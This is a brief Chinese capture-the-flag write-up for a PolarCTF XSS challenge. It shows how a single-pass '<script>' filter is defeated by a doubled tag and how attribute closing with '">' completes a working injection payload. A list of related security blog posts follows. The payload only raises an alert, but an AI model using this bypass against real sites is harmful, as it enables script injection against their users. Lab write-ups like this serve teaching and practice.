很明显是个XSS,尝试常规语句发现会过滤script
尝试双写
<scscriptript>alert(123)</scscriptript>
可以看到只过滤了一次<script>,但是还没有触发弹窗
我们看下源代码,发现需要对value进行闭合
那么payload如下:
"><scscriptript>alert(123)</scscriptript>
【PolarCTF】浮生日记
大方子2026-01-24 9:25
相关推荐
C2H5OH10 小时前
PortSwigger SQL注入LAB7 & LAB8 & LAB9small_white_robot14 小时前
(Win)文件上传数据流绕过-面试常考宋浮檀s16 小时前
SQL注入基础+DVWA搭建汤愈韬19 小时前
hcip-security_防火墙高可靠技术4—双机热备结合NAT虚拟世界AI20 小时前
从零到黑客:渗透测试实战指南X7x520 小时前
堡垒机:企业运维安全的“数字守门人“ze^020 小时前
Day03 Web应用&OSS存储&负载均衡&CDN加速&反向代理&WAF防护&部署影响HMS工业网络1 天前
如何解决使用TwinCAT时EtherCAT网络出现“Sync Manager Watchdog”报错сокол1 天前
【网安-Web渗透测试-内网渗透】域环境权限维持